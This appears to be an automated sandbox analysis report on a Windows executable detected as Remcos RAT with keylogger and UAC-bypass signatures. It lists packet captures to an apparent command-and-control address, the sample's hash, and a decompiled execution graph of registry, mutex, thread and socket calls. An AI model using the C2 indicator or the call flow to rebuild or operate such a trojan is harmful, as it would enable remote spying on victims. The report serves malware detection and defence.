                                                Jan 10, 2025 23:50:41.569619894 CET501033678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:41.569664001 CET501033678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:41.574480057 CET367850103192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:50:41.614268064 CET501043678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:41.619098902 CET367850104192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:50:41.619189978 CET501043678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:41.619540930 CET501043678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:41.624304056 CET367850104192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:50:43.018820047 CET367850104192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:50:43.019325018 CET501043678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:43.023216963 CET501043678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:43.029011965 CET367850104192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:50:43.067130089 CET501053678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:43.071950912 CET367850105192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:50:43.075293064 CET501053678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:43.075697899 CET501053678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:43.080651045 CET367850105192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:50:44.505270958 CET367850105192.210.150.26192.168.2.10
                                                Jan 10, 2025 23:50:44.511334896 CET501053678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:44.511334896 CET501053678192.168.2.10192.210.150.26
                                                Jan 10, 2025 23:50:44.516186953 CET367850105192.210.150.26192.168.2.10

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Target ID:1
                                                Start time:17:46:37
                                                Start date:10/01/2025
                                                Path:C:\Users\user\Desktop\NssBkEQKsI.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\NssBkEQKsI.exe"
                                                Imagebase:0x400000
                                                File size:492'544 bytes
                                                MD5 hash:575D16384315352AA0A0B0EAB3A62B6C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3721678274.000000000232F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:3.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:25.5%
                                                  Total number of Nodes:1171
                                                  Total number of Limit Nodes:46
                                                  execution_graph 46206 4429fc 46207 442a05 46206->46207 46208 442a1e 46206->46208 46209 442a0d 46207->46209 46213 442a84 46207->46213 46211 442a15 46211->46209 46224 442d51 22 API calls 2 library calls 46211->46224 46214 442a90 46213->46214 46215 442a8d 46213->46215 46225 44e1be GetEnvironmentStringsW 46214->46225 46215->46211 46218 442a9d 46234 446ac5 20 API calls __dosmaperr 46218->46234 46221 442ad2 46221->46211 46222 442aa8 46233 446ac5 20 API calls __dosmaperr 46222->46233 46224->46208 46226 442a97 46225->46226 46227 44e1d2 46225->46227 46226->46218 46232 442ba9 26 API calls 3 library calls 46226->46232 46235 446aff 46227->46235 46229 44e1e6 _Yarn 46242 446ac5 20 API calls __dosmaperr 46229->46242 46231 44e200 FreeEnvironmentStringsW 46231->46226 46232->46222 46233->46218 46234->46221 46236 446b3d 46235->46236 46237 446b0d std::_Locinfo::_Locinfo_dtor 46235->46237 46244 445354 20 API calls _Atexit 46236->46244 46237->46236 46238 446b28 RtlAllocateHeap 46237->46238 46243 442200 7 API calls 2 library calls 46237->46243 46238->46237 46240 446b3b 46238->46240 46240->46229 46242->46231 46243->46237 46244->46240 46245 43a998 46247 43a9a4 _swprintf __FrameHandler3::FrameUnwindToState 46245->46247 46246 43a9b2 46263 445354 20 API calls _Atexit 46246->46263 46247->46246 46251 43a9dc 46247->46251 46249 43a9b7 46264 43a827 26 API calls _Deallocate 46249->46264 46258 444acc EnterCriticalSection 46251->46258 46253 43a9e7 46259 43aa88 46253->46259 46256 43a9c2 __wsopen_s 46258->46253 46261 43aa96 46259->46261 46260 43a9f2 46265 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 46260->46265 46261->46260 46266 448416 39 API calls 2 library calls 46261->46266 46263->46249 46264->46256 46265->46256 46266->46261 46267 402bcc 46268 402bd7 46267->46268 46269 402bdf 46267->46269 46285 403315 28 API calls 2 library calls 46268->46285 46271 402beb 46269->46271 46275 4015d3 46269->46275 46272 402bdd 46279 43360d 46275->46279 46277 402be9 46279->46277 46281 43362e std::_Facet_Register 46279->46281 46286 43a88c 46279->46286 46293 442200 7 API calls 2 library calls 46279->46293 46280 433dec std::_Facet_Register 46295 437bd7 RaiseException 46280->46295 46281->46280 46294 437bd7 RaiseException 46281->46294 46284 433e09 46285->46272 46290 446aff std::_Locinfo::_Locinfo_dtor 46286->46290 46287 446b3d 46297 445354 20 API calls _Atexit 46287->46297 46288 446b28 RtlAllocateHeap 46288->46290 46291 446b3b 46288->46291 46290->46287 46290->46288 46296 442200 7 API calls 2 library calls 46290->46296 46291->46279 46293->46279 46294->46280 46295->46284 46296->46290 46297->46291 46298 4339be 46299 4339ca __FrameHandler3::FrameUnwindToState 46298->46299 46330 4336b3 46299->46330 46301 4339d1 46302 433b24 46301->46302 46305 4339fb 46301->46305 46630 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46302->46630 46304 433b2b 46631 4426be 28 API calls _Atexit 46304->46631 46315 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46305->46315 46624 4434d1 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 46305->46624 46307 433b31 46632 442670 28 API calls _Atexit 46307->46632 46310 433a14 46312 433a1a 46310->46312 46625 443475 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 46310->46625 46311 433b39 46314 433a9b 46341 433c5e 46314->46341 46315->46314 46626 43edf4 38 API calls 3 library calls 46315->46626 46324 433abd 46324->46304 46325 433ac1 46324->46325 46326 433aca 46325->46326 46628 442661 28 API calls _Atexit 46325->46628 46629 433842 13 API calls 2 library calls 46326->46629 46329 433ad2 46329->46312 46331 4336bc 46330->46331 46633 433e0a IsProcessorFeaturePresent 46331->46633 46333 4336c8 46634 4379ee 10 API calls 3 library calls 46333->46634 46335 4336cd 46340 4336d1 46335->46340 46635 44335e IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46335->46635 46337 4336da 46338 4336e8 46337->46338 46636 437a17 8 API calls 3 library calls 46337->46636 46338->46301 46340->46301 46637 436050 46341->46637 46344 433aa1 46345 443422 46344->46345 46639 44ddc9 46345->46639 46347 44342b 46348 433aaa 46347->46348 46643 44e0d3 38 API calls 46347->46643 46350 40d767 46348->46350 46645 41bce3 LoadLibraryA GetProcAddress 46350->46645 46352 40d783 GetModuleFileNameW 46650 40e168 46352->46650 46354 40d79f 46665 401fbd 46354->46665 46357 401fbd 28 API calls 46358 40d7bd 46357->46358 46669 41afc3 46358->46669 46362 40d7cf 46694 401d8c 46362->46694 46364 40d7d8 46365 40d835 46364->46365 46366 40d7eb 46364->46366 46700 401d64 46365->46700 46947 40e986 111 API calls 46366->46947 46369 40d845 46372 401d64 28 API calls 46369->46372 46370 40d7fd 46371 401d64 28 API calls 46370->46371 46375 40d809 46371->46375 46373 40d864 46372->46373 46705 404cbf 46373->46705 46948 40e937 68 API calls 46375->46948 46376 40d873 46709 405ce6 46376->46709 46379 40d824 46949 40e155 68 API calls 46379->46949 46380 40d87f 46712 401eef 46380->46712 46383 40d88b 46716 401eea 46383->46716 46385 40d894 46387 401eea 26 API calls 46385->46387 46386 401eea 26 API calls 46388 40dc9f 46386->46388 46389 40d89d 46387->46389 46627 433c94 GetModuleHandleW 46388->46627 46390 401d64 28 API calls 46389->46390 46391 40d8a6 46390->46391 46720 401ebd 46391->46720 46393 40d8b1 46394 401d64 28 API calls 46393->46394 46395 40d8ca 46394->46395 46396 401d64 28 API calls 46395->46396 46398 40d8e5 46396->46398 46397 40d946 46400 401d64 28 API calls 46397->46400 46415 40e134 46397->46415 46398->46397 46950 4085b4 46398->46950 46405 40d95d 46400->46405 46401 40d912 46402 401eef 26 API calls 46401->46402 46403 40d91e 46402->46403 46406 401eea 26 API calls 46403->46406 46404 40d9a4 46724 40bed7 46404->46724 46405->46404 46411 4124b7 3 API calls 46405->46411 46407 40d927 46406->46407 46954 4124b7 RegOpenKeyExA 46407->46954 46409 40d9aa 46410 40d82d 46409->46410 46727 41a463 46409->46727 46410->46386 46416 40d988 46411->46416 46414 40d9c5 46417 40da18 46414->46417 46744 40697b 46414->46744 47032 412902 30 API calls 46415->47032 46416->46404 46957 412902 30 API calls 46416->46957 46419 401d64 28 API calls 46417->46419 46422 40da21 46419->46422 46431 40da32 46422->46431 46432 40da2d 46422->46432 46424 40e14a 47033 4112b5 64 API calls ___scrt_fastfail 46424->47033 46426 40d9e4 46958 40699d 30 API calls 46426->46958 46427 40d9ee 46429 401d64 28 API calls 46427->46429 46439 40d9f7 46429->46439 46436 401d64 28 API calls 46431->46436 46961 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46432->46961 46433 40d9e9 46959 4064d0 97 API calls 46433->46959 46437 40da3b 46436->46437 46748 41ae08 46437->46748 46439->46417 46442 40da13 46439->46442 46440 40da46 46752 401e18 46440->46752 46960 4064d0 97 API calls 46442->46960 46443 40da51 46756 401e13 46443->46756 46446 40da5a 46447 401d64 28 API calls 46446->46447 46448 40da63 46447->46448 46449 401d64 28 API calls 46448->46449 46450 40da7d 46449->46450 46451 401d64 28 API calls 46450->46451 46452 40da97 46451->46452 46453 401d64 28 API calls 46452->46453 46455 40dab0 46453->46455 46454 40db1d 46456 40db2c 46454->46456 46463 40dcaa ___scrt_fastfail 46454->46463 46455->46454 46457 401d64 28 API calls 46455->46457 46458 40db35 46456->46458 46486 40dbb1 ___scrt_fastfail 46456->46486 46461 40dac5 _wcslen 46457->46461 46459 401d64 28 API calls 46458->46459 46460 40db3e 46459->46460 46462 401d64 28 API calls 46460->46462 46461->46454 46464 401d64 28 API calls 46461->46464 46465 40db50 46462->46465 47021 41265d RegOpenKeyExA 46463->47021 46466 40dae0 46464->46466 46468 401d64 28 API calls 46465->46468 46469 401d64 28 API calls 46466->46469 46470 40db62 46468->46470 46471 40daf5 46469->46471 46473 401d64 28 API calls 46470->46473 46962 40c89e 46471->46962 46472 40dcef 46474 401d64 28 API calls 46472->46474 46475 40db8b 46473->46475 46476 40dd16 46474->46476 46480 401d64 28 API calls 46475->46480 46770 401f66 46476->46770 46479 401e18 26 API calls 46482 40db14 46479->46482 46483 40db9c 46480->46483 46485 401e13 26 API calls 46482->46485 47019 40bc67 46 API calls _wcslen 46483->47019 46484 40dd25 46774 4126d2 RegCreateKeyA 46484->46774 46485->46454 46760 4128a2 46486->46760 46490 40dc45 ctype 46495 401d64 28 API calls 46490->46495 46491 40dbac 46491->46486 46493 401d64 28 API calls 46494 40dd47 46493->46494 46780 43a5e7 46494->46780 46496 40dc5c 46495->46496 46496->46472 46500 40dc70 46496->46500 46499 40dd5e 47024 41beb0 87 API calls ___scrt_fastfail 46499->47024 46502 401d64 28 API calls 46500->46502 46501 40dd81 46506 401f66 28 API calls 46501->46506 46504 40dc7e 46502->46504 46507 41ae08 28 API calls 46504->46507 46505 40dd65 CreateThread 46505->46501 47677 41c96f 10 API calls 46505->47677 46508 40dd96 46506->46508 46509 40dc87 46507->46509 46510 401f66 28 API calls 46508->46510 47020 40e219 112 API calls 46509->47020 46513 40dda5 46510->46513 46512 40dc8c 46512->46472 46515 40dc93 46512->46515 46784 41a686 46513->46784 46515->46410 46517 401d64 28 API calls 46518 40ddb6 46517->46518 46519 401d64 28 API calls 46518->46519 46520 40ddcb 46519->46520 46521 401d64 28 API calls 46520->46521 46522 40ddeb 46521->46522 46523 43a5e7 42 API calls 46522->46523 46524 40ddf8 46523->46524 46525 401d64 28 API calls 46524->46525 46526 40de03 46525->46526 46527 401d64 28 API calls 46526->46527 46528 40de14 46527->46528 46529 401d64 28 API calls 46528->46529 46530 40de29 46529->46530 46531 401d64 28 API calls 46530->46531 46532 40de3a 46531->46532 46533 40de41 StrToIntA 46532->46533 46808 409517 46533->46808 46536 401d64 28 API calls 46537 40de5c 46536->46537 46538 40dea1 46537->46538 46539 40de68 46537->46539 46542 401d64 28 API calls 46538->46542 47025 43360d 22 API calls 3 library calls 46539->47025 46541 40de71 46544 401d64 28 API calls 46541->46544 46543 40deb1 46542->46543 46546 40def9 46543->46546 46547 40debd 46543->46547 46545 40de84 46544->46545 46548 40de8b CreateThread 46545->46548 46550 401d64 28 API calls 46546->46550 47026 43360d 22 API calls 3 library calls 46547->47026 46548->46538 47675 419128 109 API calls __EH_prolog 46548->47675 46552 40df02 46550->46552 46551 40dec6 46553 401d64 28 API calls 46551->46553 46555 40df6c 46552->46555 46556 40df0e 46552->46556 46554 40ded8 46553->46554 46558 40dedf CreateThread 46554->46558 46559 401d64 28 API calls 46555->46559 46557 401d64 28 API calls 46556->46557 46561 40df1e 46557->46561 46558->46546 47680 419128 109 API calls __EH_prolog 46558->47680 46560 40df75 46559->46560 46562 40df81 46560->46562 46563 40dfba 46560->46563 46564 401d64 28 API calls 46561->46564 46566 401d64 28 API calls 46562->46566 46833 41a7a2 GetComputerNameExW GetUserNameW 46563->46833 46567 40df33 46564->46567 46569 40df8a 46566->46569 47027 40c854 32 API calls 46567->47027 46574 401d64 28 API calls 46569->46574 46570 401e18 26 API calls 46571 40dfce 46570->46571 46573 401e13 26 API calls 46571->46573 46576 40dfd7 46573->46576 46577 40df9f 46574->46577 46575 40df46 46578 401e18 26 API calls 46575->46578 46579 40dfe0 SetProcessDEPPolicy 46576->46579 46580 40dfe3 CreateThread 46576->46580 46587 43a5e7 42 API calls 46577->46587 46581 40df52 46578->46581 46579->46580 46582 40e004 46580->46582 46583 40dff8 CreateThread 46580->46583 47648 40e54f 46580->47648 46584 401e13 26 API calls 46581->46584 46585 40e019 46582->46585 46586 40e00d CreateThread 46582->46586 46583->46582 47676 410f36 137 API calls 46583->47676 46588 40df5b CreateThread 46584->46588 46590 40e073 46585->46590 46592 401f66 28 API calls 46585->46592 46586->46585 47678 411524 38 API calls ___scrt_fastfail 46586->47678 46589 40dfac 46587->46589 46588->46555 47679 40196b 49 API calls 46588->47679 47028 40b95c 7 API calls 46589->47028 46844 41246e RegOpenKeyExA 46590->46844 46593 40e046 46592->46593 47029 404c9e 28 API calls 46593->47029 46596 40e053 46598 401f66 28 API calls 46596->46598 46600 40e062 46598->46600 46599 40e12a 46856 40cbac 46599->46856 46604 41a686 79 API calls 46600->46604 46602 41ae08 28 API calls 46603 40e0a4 46602->46603 46847 412584 RegOpenKeyExW 46603->46847 46606 40e067 46604->46606 46608 401eea 26 API calls 46606->46608 46608->46590 46611 401e13 26 API calls 46614 40e0c5 46611->46614 46612 40e0ed DeleteFileW 46613 40e0f4 46612->46613 46612->46614 46616 41ae08 28 API calls 46613->46616 46614->46612 46614->46613 46615 40e0db Sleep 46614->46615 47030 401e07 46615->47030 46618 40e104 46616->46618 46852 41297a RegOpenKeyExW 46618->46852 46620 40e117 46621 401e13 26 API calls 46620->46621 46622 40e121 46621->46622 46623 401e13 26 API calls 46622->46623 46623->46599 46624->46310 46625->46315 46626->46314 46627->46324 46628->46326 46629->46329 46630->46304 46631->46307 46632->46311 46633->46333 46634->46335 46635->46337 46636->46340 46638 433c71 GetStartupInfoW 46637->46638 46638->46344 46640 44dddb 46639->46640 46641 44ddd2 46639->46641 46640->46347 46644 44dcc8 51 API calls 5 library calls 46641->46644 46643->46347 46644->46640 46646 41bd22 LoadLibraryA GetProcAddress 46645->46646 46647 41bd12 GetModuleHandleA GetProcAddress 46645->46647 46648 41bd4b 32 API calls 46646->46648 46649 41bd3b LoadLibraryA GetProcAddress 46646->46649 46647->46646 46648->46352 46649->46648 47034 41a63f FindResourceA 46650->47034 46653 43a88c ___std_exception_copy 21 API calls 46654 40e192 _Yarn 46653->46654 47037 401f86 46654->47037 46657 401eef 26 API calls 46658 40e1b8 46657->46658 46659 401eea 26 API calls 46658->46659 46660 40e1c1 46659->46660 46661 43a88c ___std_exception_copy 21 API calls 46660->46661 46662 40e1d2 _Yarn 46661->46662 47041 406052 46662->47041 46664 40e205 46664->46354 46666 401fcc 46665->46666 47049 402501 46666->47049 46668 401fea 46668->46357 46688 41afd6 46669->46688 46670 401eea 26 API calls 46671 41b078 46670->46671 46672 401eea 26 API calls 46671->46672 46674 41b080 46672->46674 46673 41b048 47056 403b60 28 API calls 46673->47056 46677 401eea 26 API calls 46674->46677 46679 40d7c6 46677->46679 46678 41b054 46680 401eef 26 API calls 46678->46680 46690 40e8bd 46679->46690 46682 41b05d 46680->46682 46681 401eef 26 API calls 46681->46688 46683 401eea 26 API calls 46682->46683 46685 41b065 46683->46685 46684 401eea 26 API calls 46684->46688 47057 41bfa9 28 API calls 46685->47057 46688->46673 46688->46681 46688->46684 46689 41b046 46688->46689 47054 403b60 28 API calls 46688->47054 47055 41bfa9 28 API calls 46688->47055 46689->46670 46691 40e8ca 46690->46691 46693 40e8da 46691->46693 47058 40200a 26 API calls 46691->47058 46693->46362 46695 40200a 46694->46695 46699 40203a 46695->46699 47059 402654 26 API calls 46695->47059 46697 40202b 47060 4026ba 26 API calls _Deallocate 46697->47060 46699->46364 46701 401d6c 46700->46701 46702 401d74 46701->46702 47061 401fff 28 API calls 46701->47061 46702->46369 46706 404ccb 46705->46706 47062 402e78 46706->47062 46708 404cee 46708->46376 47071 404bc4 46709->47071 46711 405cf4 46711->46380 46713 401efe 46712->46713 46715 401f0a 46713->46715 47080 4021b9 26 API calls 46713->47080 46715->46383 46717 4021b9 46716->46717 46718 4021e8 46717->46718 47081 40262e 26 API calls _Deallocate 46717->47081 46718->46385 46722 401ec9 46720->46722 46721 401ee4 46721->46393 46722->46721 46723 402325 28 API calls 46722->46723 46723->46721 47082 401e8f 46724->47082 46726 40bee1 CreateMutexA GetLastError 46726->46409 47084 41b15b 46727->47084 46729 41a471 47088 412513 RegOpenKeyExA 46729->47088 46732 401eef 26 API calls 46733 41a49f 46732->46733 46734 401eea 26 API calls 46733->46734 46735 41a4a7 46734->46735 46736 41a4fa 46735->46736 46737 412513 31 API calls 46735->46737 46736->46414 46738 41a4cd 46737->46738 46739 41a4d8 StrToIntA 46738->46739 46740 41a4ef 46739->46740 46741 41a4e6 46739->46741 46743 401eea 26 API calls 46740->46743 47093 41c102 28 API calls 46741->47093 46743->46736 46745 40698f 46744->46745 46746 4124b7 3 API calls 46745->46746 46747 406996 46746->46747 46747->46426 46747->46427 46749 41ae1c 46748->46749 47094 40b027 46749->47094 46751 41ae24 46751->46440 46753 401e27 46752->46753 46754 401e33 46753->46754 47103 402121 26 API calls 46753->47103 46754->46443 46758 402121 46756->46758 46757 402150 46757->46446 46758->46757 47104 402718 26 API calls _Deallocate 46758->47104 46761 4128c0 46760->46761 46762 406052 28 API calls 46761->46762 46763 4128d5 46762->46763 46764 401fbd 28 API calls 46763->46764 46765 4128e5 46764->46765 46766 4126d2 29 API calls 46765->46766 46767 4128ef 46766->46767 46768 401eea 26 API calls 46767->46768 46769 4128fc 46768->46769 46769->46490 46771 401f6e 46770->46771 47105 402301 46771->47105 46775 4126eb 46774->46775 46776 412722 46774->46776 46779 4126fd RegSetValueExA RegCloseKey 46775->46779 46777 401eea 26 API calls 46776->46777 46778 40dd3b 46777->46778 46778->46493 46779->46776 46781 43a600 _swprintf 46780->46781 47109 43993e 46781->47109 46785 41a737 46784->46785 46786 41a69c GetLocalTime 46784->46786 46788 401eea 26 API calls 46785->46788 46787 404cbf 28 API calls 46786->46787 46789 41a6de 46787->46789 46790 41a73f 46788->46790 46791 405ce6 28 API calls 46789->46791 46792 401eea 26 API calls 46790->46792 46793 41a6ea 46791->46793 46794 40ddaa 46792->46794 47143 4027cb 46793->47143 46794->46517 46796 41a6f6 46797 405ce6 28 API calls 46796->46797 46798 41a702 46797->46798 47146 406478 76 API calls 46798->47146 46800 41a710 46801 401eea 26 API calls 46800->46801 46802 41a71c 46801->46802 46803 401eea 26 API calls 46802->46803 46804 41a725 46803->46804 46805 401eea 26 API calls 46804->46805 46806 41a72e 46805->46806 46807 401eea 26 API calls 46806->46807 46807->46785 46809 409536 _wcslen 46808->46809 46810 409541 46809->46810 46811 409558 46809->46811 46812 40c89e 32 API calls 46810->46812 46813 40c89e 32 API calls 46811->46813 46814 409549 46812->46814 46815 409560 46813->46815 46816 401e18 26 API calls 46814->46816 46817 401e18 26 API calls 46815->46817 46832 409553 46816->46832 46818 40956e 46817->46818 46819 401e13 26 API calls 46818->46819 46821 409576 46819->46821 46820 401e13 26 API calls 46822 4095ad 46820->46822 47166 40856b 28 API calls 46821->47166 47151 409837 46822->47151 46825 409588 47167 4028cf 46825->47167 46828 409593 46829 401e18 26 API calls 46828->46829 46830 40959d 46829->46830 46831 401e13 26 API calls 46830->46831 46831->46832 46832->46820 47347 403b40 46833->47347 46837 41a7fd 46838 4028cf 28 API calls 46837->46838 46839 41a807 46838->46839 46840 401e13 26 API calls 46839->46840 46841 41a810 46840->46841 46842 401e13 26 API calls 46841->46842 46843 40dfc3 46842->46843 46843->46570 46845 40e08b 46844->46845 46846 41248f RegQueryValueExA RegCloseKey 46844->46846 46845->46599 46845->46602 46846->46845 46848 4125b0 RegQueryValueExW RegCloseKey 46847->46848 46849 4125dd 46847->46849 46848->46849 46850 403b40 28 API calls 46849->46850 46851 40e0ba 46850->46851 46851->46611 46853 412992 RegDeleteValueW 46852->46853 46854 4129a6 46852->46854 46853->46854 46855 4129a2 46853->46855 46854->46620 46855->46620 46857 40cbc5 46856->46857 46858 41246e 3 API calls 46857->46858 46859 40cbcc 46858->46859 46863 40cbeb 46859->46863 47375 401602 46859->47375 46861 40cbd9 47378 4127d5 RegCreateKeyA 46861->47378 46864 413fd4 46863->46864 46865 413feb 46864->46865 47395 41aa73 46865->47395 46867 413ff6 46868 401d64 28 API calls 46867->46868 46869 41400f 46868->46869 46870 43a5e7 42 API calls 46869->46870 46871 41401c 46870->46871 46872 414021 Sleep 46871->46872 46873 41402e 46871->46873 46872->46873 46874 401f66 28 API calls 46873->46874 46875 41403d 46874->46875 46876 401d64 28 API calls 46875->46876 46877 41404b 46876->46877 46878 401fbd 28 API calls 46877->46878 46879 414053 46878->46879 46880 41afc3 28 API calls 46879->46880 46881 41405b 46880->46881 47399 404262 WSAStartup 46881->47399 46883 414065 46884 401d64 28 API calls 46883->46884 46885 41406e 46884->46885 46886 401d64 28 API calls 46885->46886 46911 4140ed 46885->46911 46887 414087 46886->46887 46889 401d64 28 API calls 46887->46889 46888 401fbd 28 API calls 46888->46911 46890 414098 46889->46890 46892 401d64 28 API calls 46890->46892 46891 41afc3 28 API calls 46891->46911 46893 4140a9 46892->46893 46894 401d64 28 API calls 46893->46894 46896 4140ba 46894->46896 46895 4085b4 28 API calls 46895->46911 46898 401d64 28 API calls 46896->46898 46897 401eef 26 API calls 46897->46911 46899 4140cb 46898->46899 46900 401d64 28 API calls 46899->46900 46901 4140dd 46900->46901 47560 404101 87 API calls 46901->47560 46903 404cbf 28 API calls 46903->46911 46905 414244 WSAGetLastError 47561 41bc76 30 API calls 46905->47561 46911->46888 46911->46891 46911->46895 46911->46897 46911->46903 46911->46905 46912 41a686 79 API calls 46911->46912 46914 401d8c 26 API calls 46911->46914 46915 401d64 28 API calls 46911->46915 46916 43a5e7 42 API calls 46911->46916 46918 401f66 28 API calls 46911->46918 46921 4082dc 28 API calls 46911->46921 46922 440c51 26 API calls 46911->46922 46923 41265d 3 API calls 46911->46923 46924 412513 31 API calls 46911->46924 46925 403b40 28 API calls 46911->46925 46928 41aec8 28 API calls 46911->46928 46929 41ad46 28 API calls 46911->46929 46930 401d64 28 API calls 46911->46930 46937 405ce6 28 API calls 46911->46937 46938 40275c 28 API calls 46911->46938 46939 4027cb 28 API calls 46911->46939 46941 401eea 26 API calls 46911->46941 46943 414ae4 46911->46943 46945 414b22 CreateThread 46911->46945 46946 401e13 26 API calls 46911->46946 47400 413f9a 46911->47400 47406 4041f1 46911->47406 47413 404915 46911->47413 47428 40428c connect 46911->47428 47488 41a96d 46911->47488 47491 413683 46911->47491 47494 40cbf1 46911->47494 47500 41adee 46911->47500 47503 41aca0 GetLastInputInfo GetTickCount 46911->47503 47504 41ac52 46911->47504 47509 40e679 GetLocaleInfoA 46911->47509 47512 4027ec 46911->47512 47516 404468 46911->47516 47531 4045d5 46911->47531 47547 4047eb WaitForSingleObject 46911->47547 47562 404c9e 28 API calls 46911->47562 46912->46911 46914->46911 46915->46911 46917 414b80 Sleep 46916->46917 46917->46911 46918->46911 46921->46911 46922->46911 46923->46911 46924->46911 46925->46911 46928->46911 46929->46911 46931 4144ed GetTickCount 46930->46931 46932 41ad46 28 API calls 46931->46932 46932->46911 46937->46911 46938->46911 46939->46911 46941->46911 47563 40a767 84 API calls 46943->47563 46945->46911 47641 419e89 102 API calls 46945->47641 46946->46911 46947->46370 46948->46379 46951 4085c0 46950->46951 46952 402e78 28 API calls 46951->46952 46953 4085e4 46952->46953 46953->46401 46955 4124e1 RegQueryValueExA RegCloseKey 46954->46955 46956 41250b 46954->46956 46955->46956 46956->46397 46957->46404 46958->46433 46959->46427 46960->46417 46961->46431 46963 40c8ba 46962->46963 46964 40c8da 46963->46964 46965 40c90f 46963->46965 46966 40c8d0 46963->46966 47642 41a74b 29 API calls 46964->47642 46969 41b15b 2 API calls 46965->46969 46968 40ca03 GetLongPathNameW 46966->46968 46971 403b40 28 API calls 46968->46971 46972 40c914 46969->46972 46970 40c8e3 46973 401e18 26 API calls 46970->46973 46974 40ca18 46971->46974 46975 40c918 46972->46975 46976 40c96a 46972->46976 46977 40c8ed 46973->46977 46978 403b40 28 API calls 46974->46978 46980 403b40 28 API calls 46975->46980 46979 403b40 28 API calls 46976->46979 46984 401e13 26 API calls 46977->46984 46981 40ca27 46978->46981 46982 40c978 46979->46982 46983 40c926 46980->46983 47645 40cc37 28 API calls 46981->47645 46987 403b40 28 API calls 46982->46987 46988 403b40 28 API calls 46983->46988 46984->46966 46986 40ca3a 47646 402860 28 API calls 46986->47646 46990 40c98e 46987->46990 46991 40c93c 46988->46991 47644 402860 28 API calls 46990->47644 47643 402860 28 API calls 46991->47643 46992 40ca45 47647 402860 28 API calls 46992->47647 46996 40ca4f 46999 401e13 26 API calls 46996->46999 46997 40c999 47000 401e18 26 API calls 46997->47000 46998 40c947 47001 401e18 26 API calls 46998->47001 47002 40ca59 46999->47002 47003 40c9a4 47000->47003 47004 40c952 47001->47004 47005 401e13 26 API calls 47002->47005 47006 401e13 26 API calls 47003->47006 47007 401e13 26 API calls 47004->47007 47008 40ca62 47005->47008 47009 40c9ad 47006->47009 47010 40c95b 47007->47010 47011 401e13 26 API calls 47008->47011 47012 401e13 26 API calls 47009->47012 47013 401e13 26 API calls 47010->47013 47014 40ca6b 47011->47014 47012->46977 47013->46977 47015 401e13 26 API calls 47014->47015 47016 40ca74 47015->47016 47017 401e13 26 API calls 47016->47017 47018 40ca7d 47017->47018 47018->46479 47019->46491 47020->46512 47022 412683 RegQueryValueExA RegCloseKey 47021->47022 47023 4126a7 47021->47023 47022->47023 47023->46472 47024->46505 47025->46541 47026->46551 47027->46575 47028->46563 47029->46596 47031 401e0c 47030->47031 47032->46424 47035 40e183 47034->47035 47036 41a65c LoadResource LockResource SizeofResource 47034->47036 